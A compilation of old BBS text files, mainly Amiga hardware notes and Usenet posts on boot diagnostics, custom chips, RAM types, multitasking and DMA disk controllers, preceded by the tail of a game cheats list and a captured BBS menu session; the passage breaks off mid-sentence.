- Secci 11 - Beats Int. 19 - Ice MC 27 - 49ERS + 04 - Publicenemy 12 - Mowtronix 20 - M.C. Hammer 28 - AC/DC + 05 - Run DMC 13 - Double Dee 21 - Tony Scott 29 - Sex Pistols + 06 - Ice-T 14 - Vanilla Ice 22 - Chadjackson 30 - Obituary + 07 - Tone Loc 15 - N.W.A 23 - Beatmasters 31 - Sacrament + 08 - L.L. Cool J 16 - Daisy Dee 24 - Nenehcherry 32 - Judaspriest + + + +Ziriax +------------------------------------------------------------------------------ +While playing press 1,2,3,4,5 or 6 to light up a power and RETURN to activate +it. + + + +Zombi +------------------------------------------------------------------------------ +If you have seen Dawn Of The Dead, you already have a good idea on how to +solve most of the puzzles. But here's some extra tips anyway: 1) To lock up +the mall to keep zombies from getting in, you need to park the trucks over +the entrances. Get the key from the office on the 2nd floor and go to the +4th floor where the keys to the trucks are kept. 2) To keep the dead zombies +from coming to un-life, lock them up in the freezer in the basement. 3) before +you can go play in the basement, you need a source of light.Get the fuses and +gloves from the 3rd floor and go to it!! + + + +Zoom +------------------------------------------------------------------------------ +Hit F10 and then choose your starting level 1-30. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 20 + +Enter item#, Scan, Quit, ?=Menu + +Game Cv4eats> Q + +Base Messages, Feedback=(Message For Sysop), Genernal Text, Off=(Goodbye), +Play Area=(Online Games), STatus=(Your Account), Time=(Left On Line), +Uploads/Downloads, ?=Main Menu + + Thanks Goes Out To Magus T. For His Support In The Message Area + +>>-Main-> ? + +Places to go from the Main command prompt: + +Base : The public message base and discussion area +Gfiles : The general text files base. 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The following is a list of what happens during each and + every 'boot': + + 1. Clear all old data in RAM + 2. Disable DMA and interrupts + 3. Clear the screen + 4. Check hardware (is the 680x0 working?) + 5. Change screen color indicating pass/fail + 6. Perform checksum test of all ROMs + 7. Change screen color indicating pass/fail + 8. Begin system startup + 9. Check RAM at $C0000..move SYSBASE there + 10. Test CHIP RAM + 11. Change screen color indicating pass/fail + 12. Check if software is coming in OK + 13. Change screen color indicating pass/fail + 14. Set up CHIP RAM to receive data + 15. Link libraries + 16. Check for any additional RAM and link it + 17. Turn on DMA and interrupts + 18. Start default task + 19. Check processor and MMU type + 20. Check for an Exception (processor error) + 21. If found, do a reset + 22. If not, normal 'boot' + +As these tests are running, the Capslock key will normally 'flash' once, +and the screen will cycle colors. The chart below used in conjunction +with the above steps indicates both a 'normal' and an 'abnormal' boot. + +NORMAL Fault Condition + +Sreen color: + Dark Grey Red (indicates error in ROM) + Light Grey Green (error in CHIP RAM) + White Blue (error in a Custom Chip) + Yellow (680x0 found an error) + +Capslock Key: + Stays on for several secs One blink (ROM checksum failed) + Two blinks (RAM test failed) + Three blinks (Whatchdog timer) + Four blinks (A short exists between + 2 lines or one of the + special keys) + + +Please note that the capslock 'blinks' are short in duration (about one +second) and that your screen colors may falsely indicate a problem when +you do a 'warm' boot depending on what state the Amiga was in before the +warm boot. Its best to watch for these diagostic errors upon initial +startup. If your Amiga exhibits any of these errors frequently, you should +take it to an Authorised Service Center for service. The most common +error you will encounter is that you'll see a bright green screen at the +initial boot..this usually indicates that an addon RAM board is not +seated in its socket properly. Try reseating it before you take it all to +your dealer. You may save yourself some money;) + + + + + + + + +X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X + + Another file downloaded from: NIRVANAnet(tm) + + & the Temple of the Screaming Electron Jeff Hunter 510-935-5845 + Rat Head Ratsnatcher 510-524-3649 + Burn This Flag Zardoz 408-363-9766 + realitycheck Poindexter Fortran 415-567-7043 + Lies Unlimited Mick Freen 415-583-4102 + + Specializing in conversations, obscure information, high explosives, + arcane knowledge, political extremism, diversive sexuality, + insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS. + + Full access for first-time callers. We don't want to know who you are, + where you live, or what your phone number is. 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The Agnus chip controls the addressing for all the chips, that's why it's the only one that needs changing to increase Chip RAM to 1M for ALL the custom chips. Now it is true that Denise has the video output stuff, and Paula has the audio output stuff, but to get the true picture of how the system works you need to ignore the three IC packages, and look and the one logical unit that they function as. + +There's a great set of hires pictures showing exactly how the chips work together on Fish Disk 29. They were done by Jay Miner. + +The newer chips that have nothing to do with custom chipset are Gary and Buster. Gary is a Gate ARraY that just makes the machine cheaper to manufacture, it replaces a handful of TTL parts that do the same thing on the A1000. Buster is a BUS arbitraTER chip used on the A2000's expansion bus. + +The of course there's the 8520s, they are a semi-custom version of a common interface adapter chip. The only real difference is the format of the timer outputs. + + + +------ +COLORS +------ + +90Jun07 from Blaine Gardner@Gateway (106 Meg BBS, SLC Utah) + + 32 colors is the standard in lo-res (320 x n) screens. That's 5 bitplanes, and 2 ^ 5 = 32. The Amiga uses a bitplane setup, not pixel-packed. You can have 2, 4, 8, 16, or 32 colors just by setting up a 1, 2, 3, 4 or 5 bitplane screen. They are 100% individually addressable pixels at the 1 through 5 bitplane screens. The 64 or 4096 color screens are special modes with some limitations. 64 colors is Extra Half-Brite (EHB) mode, where a 6th bitplane is added. This bitplane specifies whether the pixel is normal or half brightness. So the second 32 colors must be the half-bright values of the first 32. The 4096 color mode is even more fun. HAM stands for Hold And Modify. You can specify 16 absolute colors, and get the rest by modifying the red, green or blue component of the previous pixel. The disadvantage is that unless you are using one of the absolute colors (which can be any of the 4096), it takes 3 pixels to change all three components (RG&B) of a color, so you can get fringing, but in practice it's not much of a problem since programs really know how to minimize the effect these days. + + On bitplanes, the amount of RAM a screen uses relates directly to the resolution and number of bitplanes. 320 x 400 x 6 bitplanes = 768,000 bits, or 96,000 bytes. 1, 2, 3, 4 and 5 bitplane screens use 16K, 32K, 48K, 64K, and 80K respectively. + + + +------------ +MULTITASKING +------------ + +Name: Piranha #7 @8100 +Date: Tue Dec 05 23:26:19 1989 + +There is a TRIVIAL amount of hardware support for multitasking in the Amiga. The custom chip set does wonderful stuff for graphics, animation, and I/O, but ti does not do much to help the machine multitask. The core of the Amiga's multitasking ability is Exec, a small, but wonderful bit of software that does all the magic. + +If the Amiga REALLY had "hardware support" for multitasking, we'd all have 68020 or 68030 based machines with hardware memory protection. That does seem to be in the distant future since CBM just took over official support of Dave Haynie's SetCPU program. But wouldn't you really prefer that a corrupt program just dumped a "core" file and terminated, instead of taking down all or part of the machine? + + +Don't Panic + +Much is made of the Amiga's ability to multitask. But what makes its multitasking different from other computers? If anyone has used Window 3.0 for the IBM, you will note that the response is a little different from the Amiga. I found this from Guy Garnett of tnc.UUCP (The Next Challenge, Fairfax, Va.), which gives a good explanation of the Amiga's multitasking system. + +Multitasking operating systems can be broken down into two broad categories, "preemptive" and "cooperative". The Amiga, as well as OS/2, Unix, and most mainframes use preemptive multitasking. Multifinder for the Mac, Windows for MS-DOS, and some other computers, use cooperative multitasking. + +Preemptive multitasking is particularly well suited for doing several things at once (which is why it is used so often); some have been known to call it "true" multitasking. Cooperative multitasking is also valid multitasking, but it is less generally useful (anything which can be done on a cooperative multitasking system can also be done with a preemptive system, in theory, but the reverse is not true). + +Programs on the Amiga have a time limit, or "slice"; when the time expires, Exec (a part of the Amiga operating system) takes control away from the running program, and gives it to the next eligible program. The time slice is so short that it appears that many programs are running at once. Programs can also give up control voluntarily; usually this happens when the program is waiting for something, like disk drives, user input, or other "real world" events. The program in effect says "I have nothing to do until someone moves the mouse (or whatever)", and so Exec starts up another program. This helps make efficient use of the computer. + +Unlike many preemptive multitasking operating systems, the Amiga has "real-time response". This means that external events can be detected and responded to quickly ("quickly" is a relative term; the Amiga can respond much faster than most other multitasking systems, although there are several which are designed to respond even faster still). For example, the system can be set up so that a certain program runs between every frame of video (this is how some programs manage color cycling). + + + +------------------------------ +READING & WRITING AT SAME TIME +------------------------------ + +Name: Piranha #7 @8100 +Date: Tue Dec 05 23:31:48 1989 + +Sorry, but the Amiga is incapable of reading or writing to more than one drive at one time. All the LED means is that the drive's motor is turned on. + +There is only one blitter channel for encoding/decoding the MFM bitstream from the drive, so only one drive at a time can be dealt with. Some copy programs go as far as having the CPU messing with one track while the blitter is decoding the next one, but that's as close as you can get. + + + +---------------------- +File systems OFS & FFS +---------------------- + +Name: Blaine Gardner #21 @8103 +Date: Tue Oct 24 23:38:22 1989 + +The file systems are largely identical, but to boost speed in the FFS, some of the redunancy of the OFS was removed. The OFS only has 488 bytes of data per block because the other 24 bytes are used for pointers to the previous block. In the OFS you have a double linked list of the blocks used by a file, both forwards and backwards. This gives you a very safe and easy to recover file system, but you lose speed because you have to strip those 24 bytes out of each block. The FFS is fast for this (and other) reasons, but it's also a but less safe because you only have one way to find a loose block, not two. + +The FFS still has enough redundancy that the security for speed tradeoff is a good choice. And with DMA controllers the speed is really noticable. With the FFS large chunks can be dropped right into RAM from the drive. With the OFS the system has to strip out the link info from the data before it can dump it to RAM. + +If you're not sure what file system a disk is using, just select the disk icon, and use the INFO menu item in Workbench. The "Bytes per block" line will report 488 for OFS and 512 for FFS. + + + +---------- +AUTOCONFIG +---------- + +Date: 29 Jul 90 17:12:28 +From: Blaine Gardner + +There are a couple of misunderstandings here. First is the meaning of "Autoconfig". Unless an expansion device has special autoconfig hardware, and is configured by the Autoconfig hardware protocol (this means among other things that RAM is added from $200000-a00000, depending on other Autoconfig cards in the system), it is NOT an Autoconfig device, but is using some other method to be added to the system. These methods include "Addmem", and the "Ranger" $c00000 address range trick. + +Anything, including the A501, the Spirit Tech, and Michigan Software Insider, that use the $c00000 addressing trick, are NOT Autoconfig, even though they are automatically added to the system. + +The second misunderstanding is the difference between hardware design, and address space. It makes no difference at all in the performance of the hardware what address space the RAM responds to. On the other hand, if the physical design of the RAM expansion shares the Chip RAM bus, then no matter what address space the board is jumpered to, it will still be a victim of Chip bus contention and slowdown. + +So based on the fact that your board is "autorecognized" (NOT "Autoconfiged") at $c00000, and the fact that your Chip RAM and Fast RAM timings are nearly identical, I'd have to stand by my conclusion that your RAM board design is sharing the Chip RAM bus. If this is true, there is nothing you can do to speed it up, other than redesign it. + +Oh, one more thing, if you jumper your board at anything other than the $c00000-e00000 range, does the system automatically recognize it, or do you have to run an "Addmem" type of program? + + + +--- +RAM +--- + +Chip RAM: Accessed by both the custom chips, and the 68000. The ONLY RAM that the Chips can access. All graphics, sound and I/O activity MUST take place in Chip RAM. + +Fast RAM: Most expansion RAM. Can't be accessed by the Chipset, and not on the same bus, so not subject to interruption by them. Therefore "Fast" RAM. + +Half Fast RAM: (say it quick a couple of times :-) The A501 expanson for the A500, or the extra 512K on the A2000 motherboard. Not available to the Chipset, but on the same bus, so subject to interruption by the chipset. Slower than real Fast RAM. + +The Amiga's bus is clocked at 14 MHz, with the 68000 and chipset taking alternate cycles, so they get 7 MHz each. If needed the chipset will steal the bus from the 68000. This does cause slowdowns in program execution, but speeds things up in general because the chipset is more efficient than the 68000 (for graphics, sound, I/O, etc). + +That's with only 512K. With Fast RAM, the 68000 runs at full speed all the time because the chipset cannot interrupt it. It doesn't actually run any faster than Chip RAM, but it's not possible to run SLOWER as it is with Chip RAM. + +Half Fast was the nickname given to what some people saw as the half-assed design of the extra 512K in the new Amigas. You get the worst of both worlds: No access for the chipset, but subject to interruption by the chipset. This was explained away as a cost cutting measure (cheaper to put it on the Chip RAM bus and save the price of another bus and buffers, etc.) But now we know that it was the prelude to the new 1 megabyte Fat Agnus. Now that the new Agnus has been released, the drawbacks of the Half Fast RAM become the great advantages of an extra 512K of Chip RAM. All you do is swap chips, and change one jumper. + +Nothing should change with the extra Chip RAM, except you can have more graphics intensive programs running at once. If you've never run out of Chip RAM while you still had a large chunk of Fast RAM left, you don't need the new chip. I run a 704x470 Workbench screen, and DPaint III can't run in 640x400 16 color mode because it's such a Chip RAM hog. + +The speed of the former Half Fast RAM doesn't change, it just becomes available for use by the chipset. If you've got a 1 megabyte 500 or 2000, ALL of your RAM becomes Chip RAM, but there is no speed change. + + +Don't Panic + +CHIP RAM - This is the first 512K of memory (1 Meg if you have the fatter Agnus, 2 Megs if you happen to have a 3000). This memory is used by the processor and custom chips (hence the name CHIP) for programs, graphics, and audio data. Since the custom chips can block the processors' access to the RAM, programs run slower here. If the custom chips are very active at a given time, the CPU must wait for the bus to be free for it's use. [Some activities of the custom chips can 'cycle steal' from the CPU, causing it to be forced to wait]. Normally, the 68000 on the Amiga only needs the bus every alternate clock cycle in order to run full speed...thus the other cycles not used are taken up by the custom chips. However, when the blitter is in use, or the coprocessor (COPPER), you see some of this cycle stealing. + +FAST RAM - FAST RAM on the Amiga is any RAM out of the reach of the custom chips. It is known as FAST RAM because code and data may be accessed by the CPU there faster, as it does not have to deal with the bus contention in the CHIP RAM addressing space. With FAST RAM on the system, the CPU can generally run full speed regardless, provided the code/data being accessed is in said FAST RAM, as the custom chips cannot access this memory medium, and are not using it's bus. + +Autoconfig RAM - AutoConfig memory is basically a setup of the OS and the memory board which uses it. When a memory board is considered to be AutoConfig, the system will automatically configure it into the free memory pool upon startup. Basically, AutoConfig allows a board to be assigned to a memory address slot based on what is free on the system at configuration time, without your having to configure it manually. On startup, the each board along the line (of physical slots in the machine) appears at a specific memory location, and presents ID information, whereby it is configured to a suitable address space on the system. This done, the next board in line appears, and the same process repeats...on down the line until no further AutoConfig boards remain. Non-AutoConfig memory is not recognized in this manner, and is designed for a specific memory address location only. Using a program such as AddMem, or AddRAM, you are telling the OS where in the addressing space this board can be found, and adding it's memory to free pool list. + +32-bit RAM - On a 16 bit bus (16-bit memory), 16 bits of data can be operated on at one time (transferred about, etc...). The 32bit bus can work with 32-bits of data at a time. Thus if you are running two different buses...on 16-bit and one 32-bit, the 32-bit bus can handle more data at a given interval (assuming appropriate processors for each and equivalent bus speeds). This is handled at the interface logic and bus level. Therefore a 32 bit processor such as a 68020 or 68030 with 32 bit memory (a 3000 or 2500) can access information faster than a 16 bit 68000, even though they might be running at the same speed. + +On many accelerators, (ones with a Memory Management Unit (MMU) in place), it is possible to take an "image" of the system ROM, copy it to a faster medium (32-bit bus area...the accelerator's memory area), then use the MMU to translate address requests to where the ROM image originally was to it's new location. This is done to speed up the system ROM calls. The first 3000's (the ones with "magic" ROMS) did this. allowing the user to load either OS 1.3 or 2.0. + +FASTMEMFIRST - Memory on the Amiga is prioritized. Now, normally CHIP RAM is given a priority on the system of -10. This is to insure it is not used by programs requesting simply "I want a chunk of memory", and not saying "and it needs to be CHIP". This helps prevent CHIP RAM from being used for things which do not need to be there. Now, FastMemFirst is special. On Amigas with 512K of CHIP RAM, the other 512K which make up the 1 meg std. complement is what is called "SLOW-FAST" RAM. This is because, while the custom chips cannot use it, it is still subject to the bus contention for CHIP RAM. FastMemFirst is useful if you have this "SLOW-FAST" memory, and also have true FAST memory on the system. What it does is place your "SLOW-FAST" memory at the same -10 priority as CHIP RAM. Since most true FAST RAM will default to a priority of 0, it places your true FAST RAM ahead of the CHIP and SLOW-FAST memory on the memory lists. This is so programs which do not need to use CHIP RAM (and a program's actual CODE never does for the most part) will be placed in you FAST RAM, and run somewhat faster. SLOW-FAST and CHIP will only be used when either requested specifically by a program, or when your FAST RAM is filled. + + + +-------------------------------------- +PROCESSOR SPEEDS / COMPUTER COMPARISON +-------------------------------------- + +From: daveh@cbmvax.commodore.com (Dave Haynie) +Path: ncr-sd!sdd.hp.com!usc!cs.utexas.edu!uunet!cbmvax!daveh +Organization: Commodore, West Chester, PA + +Your friend is on the right track, but obviously confused about the details. Basically, it's meaningless to compare the clock speeds of different chip architectures without knowing both architectures. The clock speed has little to do with how long the actual chip takes to perform an operation. For at least older CPUs, one actually meaningful number is the bus speed -- how many clocks does the CPU take to run a single cycle on its memory bus. A 68000, an 8086, and several other CPUs of the same vintage take 4 processor clock cycles to run one memory cycle. The Z-80 runs a 3 clock cycle to fetch an instruction, a 4 clock cycle to fetch data. The 6502 takes a single clock for its minimum memory cycle. So while you can figure that an 8MHz 68000 and 8MHz 8086 talk to memory at about the same speed, an 8MHz 6502, if such a chip existed, would be talking to memory more like a 32MHz 68000. + +Motorola and Intel chips of the same basic generation are going about the same memory speed at the same clock rate. For example, both the 80386 and the 68030 take two clock cycles to access memory. Motorola is indeed making faster 68030s than Intel makes 80386s, and they really do go faster. Some RISC chips actually handle one memory cycle per clock cycle, and the burst mode found on 68030s, 68040s, and 80486s lets these chips fetch 4 longwords in as little as 5 clocks, coming close to 1 word per clock. + +And memory fetch is only part of the question. Many CPU operations are internal to the part, and some happen in fewer clocks. The 68040, for instance, takes only one clock to fetch from internal cache, while the 68030 takes the standard two clocks for internal cache fetches (both can fetch from both caches at the same time). + +To sum up, an 8MHz 68000 runs much the same kind of cycle as an 8MHz 8086. An 8MHz 68020 can hit memory 1.5 times as fast, an 8MHz 68030 or 80386 can hit memory 2 times as fast, and a 8MHz 68030 or similar chip can hit burst mode memory nearly 4 times as fast as the 68000 or 8086. Of course, since the 68030 has a 32 bit bus, this is actually a data transfer rate closer to 8 times faster. + +You can't tell the performance of any _SYSTEM_ simply by looking at the CPU's clock speed. You need to know the kind of memory the CPU is talking to (including possibly system-level caches), the any overhead work the CPU is doing (eg, is there other hardware helping out the CPU, or is the CPU being used to replace some hardware), and the nature of the operating system that's driving the whole thing. + +You also need to know the kind of program that's running. You can find some things that a garden variety 12MHz AT will do faster than a plain 68000-based Amiga, and other things the Amiga will do faster. If you know the chip types, you can certainly make a few performance estimates when comparing system to system: you know how many clock cycles a memory fetch would take, what kind of objects the CPU can manipulate, etc. In general, 80286 system compare with 68000 system, 68020 and 68030 system compare with 80386 systems, and 68040 systems should compare well with 80486 systems. + +But again, it depends on how the thing is built. HP has a 50MHz 68030 system that beats most 25MHz 80486 systems in most integer benchmarks (though you'll find the same benchmark on the same system will change depending on the OS in charge at the time). Of course, the HP is designed to be a workstation, and costs like one, whereas most 80486 systems are built much like other PCs. And there's nothing much HP could do to make that machine equal the 80486 in floating point operations, other than dropping a 68040 into it. + + +Machine/OS-- Amiga Mac Atari/TOS 386/UNIX/X-win NeXT + Feature: II SE ST Mega Vista 1280x + + NTSC X X X X X + + Multitasking X X X X X X + Cooperative X X + Preemptive X X X + Coop.-Preemp. X + Lightweight X X X X + Heavyweight X X X + Real-time + Process Protection X X X + Virtual X X X + + Windows/screens X X X X X X X X + Multitasking X X X X X X + Multiresolution X X N/A X + exclusive X + swapped X + windowed + sliding X + Hardware Assist X X X X X + exclusive X + queued X X X X X + prioritized + + + Table Notes (or Small Print and Definitions): + + All systems are essentially "basic", the Mac II and 386 systems don't come with video cards, so for the table I simply picked the cards which had the features you asked for, namely NTSC and hardware assist (blitter). + +Cooperative/Preemptive/Coop.-Preemp.: C. means a process must go into wait for another process to get time. P. means all processes get time relative to priority. C.-P. means that all processes of high priority must go into wait for lower priority processes to get time (in retrospect this, rather than lightweight, is probably what markD originally meant by 'real-time'). + +Multiresolution: Multiple modes are really an artifact of less expensive hardware (allowing trade-off between resolution and bits/pixel) or brain-dead "standards" that cause every device from now until eternity to emulate every earlier device. "Faulting" a 386/UNIX/X/Vista combination -- which can practically "fill" an NTSC signal to the max -- because it can't do alower resolution/bits-per-pixel doesn't make sense, N/A = Not Applicable. Exclusive means the user switches the mode that all applications use (doesn't qualify for "virtual"). Swapped means the application uses a mode and the OS "swaps" the entire screen when you change apps (this is for those brain-dead designs). Windowed means that each window/workspace can have a different resolution. Sliding is a subset of windowed where the mode can only change horizontally or vertically, like a sliding blackboard. Although the ST has multiple modes, you have to reinitialize (i.e. reboot) GEM between them, so I didn't 'X' that. + +Hardware Assist: Exclusive means a process can request exclusive use of the video hardware, side-stepping the queueing that is normally done. + + > Of course the implementation would be different, my only argument is that a VRAM system of the same flexibility as the Amiga would be far more expensive. + + Yes, I think it would be more expensive to use VRAM, I gave the reasons (mainly VRAM+support vs. DRAM) a while back. But, no, if I am wrong about the cost (as Jeff is still trying to convince me of), there is no reason it could not have been as versatile. For example, there isn't really a problem with the VRAM shift register reload time, you have to account for that in _any_ system that is more than 256 wide, you account for it by using a FIFO in front of your pallette that can hold enough pixels during the reload. Ttyhe FIFO/reload puts a limit on how often you can change buffers, but within those limits you can use the copper and have "windowed" virtual screens just like now you have "sliding" virtual screens (Intel's controller can do this). Sprites, like now, are loaded during horizontal retrace. Yes, it's very difficult to implement non exponent-of-2 bits/pixel, but with VRAM you'd would have had the bandwidth (the DRAM limiting factor) to go up to 640x480x8 (even with the A1000's 256k+256k, no less!). And if people the likes of Fred Fish and Leo Schwab are to be trusted ( :-) ), 640x480x8 looks quite a bit better than 320x480 HAM. + +> Would you like to write every graphics routine to support 5 or 6 different numbers of bits per pixel like the Mac II? + + If I could get as many people to buy each of those different bits/pixel systems as Apple has already managed to do, I would be delighted :-). I think it ends up being better tieing the driver-level drawing routines to the hardware, let the hardware match the intended use, and let the OS be ignorant of how the hardware's organized. If the intended use is bits-per-pixel vs. resolution vs. memory then bit-planes are a great way to generalize. If the intended use is single-mode 1280x900x8 it turns out that one can implement a faster line draw using 1 8-bit byte pixel than can be done with 8 16-bit-word planes, mostly due to overhead of reloading the bit-plane parameters. + + + + ST/Amiga Comparison + ------------------- + +Please send updates, corrections, and questions to ken_macleod@pedro.UUCP, or ken_macleod at Bitsko's Bar & Grill, (801) 277-0272. + + Color 520STfm Amiga 500 w/Color Monitor + ------------------- ----------------- + $699 Price(1) $769 + 8.0 Mhz Processor Speed 7.2 Mhz + 1000 Software(1) ?? + ?? Units sold/shipped(1,2) 600k Video + 320x200x16 blitter + 640x200x4 DMA palette changes + 640x400x2 non-interlaced(3) 320x200x2,4,8,16,32,64,HAM + 320x400x2,4,8,16,32,64,HAM interlaced + 352x242x2,4,8,16,32,64,HAM overscanned + 352x484x2,4,8,16,32,64,HAM overscanned + interlaced 640x200x2,4,8,16 + 640x400x2,4,8,16 interlaced + 704x242x2,4,8,16 overscanned + 704x484x2,4,8,16 overscanned interlaced + multiple video modes on-screen + 16 sprites + +Sound + 3/1 channel 4 channel + single waveform D/A buffer, 28kHz, 8bits + stereo + + +Disk Drives + one 720k one 880k + + +Operating System + command line interpreter(4) command line interpreter + WIMP(4) WIMP + 8 overlapping windows time-sliced prioritized multitasking + pipes + messaging + signals + semaphores shared-libraries + prioritized interrupt handling + overlapping windows (screen-bound) + sliding screens + 68010/68020 compatible/aware + animation handler + speech synthesizer + +Miscellaneous + 512k 512k + cartridge port expansion bus + SASI port + MIDI port + + +The following are higher end machines similar to the above, unless otherwise noted they have all of the features shown above: + +1040ST: Amiga 1000 (discontinued): + 1024k detached keyboard + +Mega ST 2 or 4: Amiga 2000: + 2048k or 4096k Detached keyboard + Detached keyboard Internal slots (IBM, Zorro, video) + blitter Battery-backed clock + expansion bus + +----------------------------------------------------------------------- + +(1) These numbers, of course, are dated. + By the time you read this they're + wrong. +(2) Units sold/shipped include compatible units. +(3) 640x400x2 requires a different monitor, totaling $752(1). + Machine must be rebooted between monitor switches. +(4) CLI and WIMP are exclusive of each other. + + + + +--- +DMA +--- + +Date: 29 Jun 90 12:36:52 +From: Blaine Gardner + +The problem is moving data from the hard drive to RAM. There are two ways to do this, DMA (Direct Memory Access), or copying it with the CPU. + +With DMA the DMA controller requests control of the bus, then directly dumps the data into the desired RAM location. The data traverses the bus only once, from DMA controller to RAM. + +In non-DMA (CPU driven I/O) controllers the CPU fetches the data from the controller, then copies the data from the CPU registers to the final location in RAM. This makes TWO trips across the bus, one from drive to CPU, and a second from CPU to RAM. + +Regardless of anything else, you can see that DMA is twice as efficient in bus usage as CPU driven I/O. + +The other way DMA is better is that while a DMA transfer is taking place, the CPU is free for anything else. In a non-DMA design, the CPU is being used for the grunt work of transferring data, so it cannot do anything else while data transfer is happening. + +Remember that this is all happening very fast, so you will not see a non-DMA controller lock up the system during a data transfer because the usual task-switching is taking place. But you will see the CPU free time hit 0%. A DMA controller will leave about 90-95% of the CPU time free. + + +Another advantage to the A2091 is that it does not shut off interrupts when doing disk access like the Kronos does. A friend was unable to download to his hard drive with the Kronos controller, until someone told me that the default setup from CLtd disables interrupts during disk access, in order to get better benchmark times. Sure enough, when we enabled interrupts again, my friend stopped getting errors when downloading to the hard drive, and it did drop the drive benchmark speeds noticably. + +Remember that there are three kinds of lies: Lies, Damned Lies, and Benchmarks. + +If you really want a good indication of a drive or controller's performace, get Disk Speed 3.1 (by Michael Sinz, of CBM) from Fish Disk 329, and run it in "High Intensity" mode with both "DMA Contention" and "CPU Contention" on. Then run it again with both contention modes off. + +This will tell you not only how fast your setup performs under ideal conditions (what every controller seller quotes), but the contention modes will tell you what your setup will do under worst-case modes. Expect to see a dramatic fall off in speed for CPU driven controllers. + +Also, run PerfMon at the slowest time to see what impact on CPU time your hard drive setup has. The Hardframe uses about 20% of the CPU time at most. This will be close to 90% for CPU driven controllers. + +Oh, I meant to say, have PerfMon running WHILE you are running DiskSpeed. + +And for the best, and most repeatable results, run the test on a freshly formatted partition. Fragmentation can cut your speed by half. + + + + +From: daveh@cbmvax.commodore.com (Dave Haynie) +Date: 4 Sep 90 21:11:29 GMT +Organization: Commodore, West Chester, PA + +In article <1990Aug30.195419.25644@sisd.kodak.com> jeh@sisd.kodak.com (Ed Hanway) writes: >In article <02102.123056@thiger.UUCP> skraw@thiger.UUCP (Stephan von Krawczynski) writes: >>DMA (other than bitmap) runs into heavy troubles sometimes during +>>overscan-graphics (e.g.) +>[...] +>>i have seen no dma-controller yet, that didn't have problems. +>[...] +>>amigamem troughput brings the thing down to some 100 kBytes (a typical + +>Well then I guess that you've never seen a HardFrame. Using the Diskspeed +>benchmark with DMA contention turned on, my disk transfer speeds slow from +>about 800k/sec to about 650k/sec, which seems completely reasonable to me. +>I don't know where you get the idea that 100k/sec is a typical bottleneck. + +It certainly isn't. The real question is, more than likely, what's the target of your DMA. If you have Fast memory in the system, than the Chip bus saturation is really only a DMA lag problem -- how long might the DMA device have to wait before it gets the bus. Once it has the bus, the transfer into Fast memory occurs at full bus speed. If the DMA was to Chip memory, then it's the same problem the CPU had -- waiting for retrace times. + +>My question to all the DMA opponents is this: given that 4 bitplane hires +>overscanned screen DMA does eat up most of the chip memory bandwidth, why +>should processor-controlled I/O be any better than DMA at using the remaining +>bandwidth? + +It's actually worse, if it relies on any interrupt activity. To begin the transfer, the either CPU or the potential bus master must wait for a clear cycle. The bus master gets it in a single cycle, most of the time, while any interrupt will have to wait for an instruction boundary, and then in most cases fetch its vector from Chip memory anyway. So, DMA or not, you are most likely taking the largest bottleneck waiting on interrupts, not the actual transfer, as long as there's fast memory around. If you have an A2620 or '030 system, try SetCPU V1.6 (to get supervisor stack out of Chip memory) and one of the MoveVBR things to get interrupt vectors out of Chip memory, and your Chip-bus-saturated disk performance should go up, a little or alot will depend on the + +>although a 68030 tight loop might approach DMA efficiency. + +Compared with 16 bit DMA, it does approach DMA efficiency in the limit as 68030 memory access time approaches 0 (not being facetious here; one 32 bit RAM access can be 200ns or less, while two 16 accesses take at least 1120ns). Of course, what you want is to build a DMA controller for the 68030 bus. See "A3000" for more details :-) + + +In article <02048.002057@thiger.UUCP> skraw@thiger.UUCP (Stephan von Krawczynski) writes: +>>> True DMA (ala the A2090) is VERY important to me. GVP claims +>>> this board is. Anybody have one that can comment? +>1. GVP does not DMA to amiga-memory. + +That's true, at least with the original GVP board. I don't know the details +of the new one. + +>2. why is DMA so important for you? it is generally slower than the +>processor-method (lets call it this way). + +That's ABSOLUTELY INCORRECT. But sometimes a misconception amoung the uninformed. You have to understand the problem you're trying to solve to get a true picture of what's happening. And that problem is, how can you efficiently transfer data from the SCSI chip into system memory. + +The simplest approach would, of course, be to have the CPU wait on the SCSI chip and copy over every single byte as it's available. This is basically what the pre-IIfx Macintoshes all do; they pretend the SCSI chip is slow, 8-bit wide memory, and wait for each byte to become available in a tight CPU copy loop. This is a loosing proposition from the start, however. The most common form of SCSI transfer, asynchronous SCSI, runs at up to 1.5 MB/s (Megabytes per second). Your A2000 bus runs at about 3.5 MB/s. If you run it at only 8 bits/transfer, that's cut down to 1.75 MB/s. However, using the CPU to do the copying, at best, you need two byte reads and one word write to get a word from SCSI chip into memory. That's a maximum speed of 1.17 MB/s for the transfer (neglecting any overhead from the transfer loop, which will be non-zero), and during that transfer, the CPU gets to do NOTHING but copy the data from the SCSI chip. This can't even keep up with SCSI, so we throw it out for anything but the cheapest controllers (the original TrumpCard and the original C Ltd controllers worked this way). + +The next approach would be to funnel two SCSI bytes into one word and do the same wait-copy approach. This would yield a maximum transfer rate of 1.75 MB/s, which will keep up with asynchronous SCSI at its fastest. However, this wait-copy approach has severe drawbacks. It gets the data into memory extremely fast, since nothing but the copy can happen until the data is in memory. But you may actually be WAITING for the data from the SCSI drive, for seeks or other times at which you're not getting it in at full speed. This kind of scheme may APPEAR to be the fastest transfer, since in using polled I/O instead of interrupts, there's never any lag at the end of the transfer, but you sacrifice your SYSTEM speed for hard disk speed. Overall, things will be slower, since you actually end up wasting time in wait states, waiting on the hard disk. Single tasking systems like the Macintosh or PC might take this OK, since they have nothing else to do anyway, but it's no good for an Amiga. C Ltd's Kronos and Supra's WordSync both funnel SCSI into the 16 bit data path, though I don't know if they hog the bus as described or not. + +The third approach is to add a buffer to your CPU copy approach. In this system, you have the SCSI chip itself conduct a DMA-like transfer into some private controller memory (many SCSI chips provide a counter output to make the hardware for this easy). Once the transfer is complete, the controller interrupts the CPU, which does a fast memory-to-memory copy of the acquired data block, all at once. The transfer speed here is still the same 1.75 MB/s as in the previous method, however, it always occurs at full speed. The preceived disk speed may be a bit slower, since the actual transfer doesn't start until the block is fully read, but the overall SYSTEM goes faster, since no time is wasted in wait states. The GVP controller does this. + +The final method is true DMA. While DMA controllers can use a full block buffering method, most use some kind of FIFO, which tends to be more efficient with DMA. The DMA controller can transfer data at the full 3.5 MB/s, although asynchronous SCSI can only manage 1.5 MB/s. The CPU will set up the DMA controller with a destination for any 